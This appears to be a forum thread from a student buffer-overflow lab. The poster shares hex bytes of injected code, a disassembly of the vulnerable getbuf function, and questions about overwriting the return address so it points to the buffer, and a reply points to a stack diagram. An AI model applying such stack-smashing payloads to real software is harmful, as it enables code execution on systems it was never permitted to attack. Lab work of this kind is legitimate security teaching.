I have code for my exploit string which is
c7 05 c0 a1 04 08 74 28 5e 70 68 c0 8d 04 08 c3
My problem is that i can't figure out how to put it into the buffer and get this particular code to be called.
Am i supposed to do something like this?
c7 05 c0 a1 04 08 74 28 5e 70 68 c0 8d 04 08 c3 xx xx xx xx
where the x's are the are the begining address of the buffer? The buffer size is 16 so should i overwrite the return address so that it points back to the begining of buffer?
Dump of assembler code for function getbuf:
0x08048f40 <getbuf+0>: push %ebp
0x08048f41 <getbuf+1>: mov %esp,%ebp
0x08048f43 <getbuf+3>: sub $0x18,%esp
0x08048f46 <getbuf+6>: lea 0xfffffff4(%ebp),%eax
0x08048f49 <getbuf+9>: mov %eax,(%esp)
0x08048f4c <getbuf+12>: call 0x8048dd0 <Gets>
0x08048f51 <getbuf+17>: mov $0x1,%eax
0x08048f56 <getbuf+22>: leave
0x08048f57 <getbuf+23>: ret
0x08048f58 <getbuf+24>: nop
0x08048f59 <getbuf+25>: lea 0x0(%esi),%esi
I don't know how to find the beginign address of the buffer though. i am also not sure if i just put the exploit code into the buffer and then overwrite the return address with the begining address of the buffer.
especially the little stack overview I posted here :
It should help you figure out where you can overwrite the return address ;)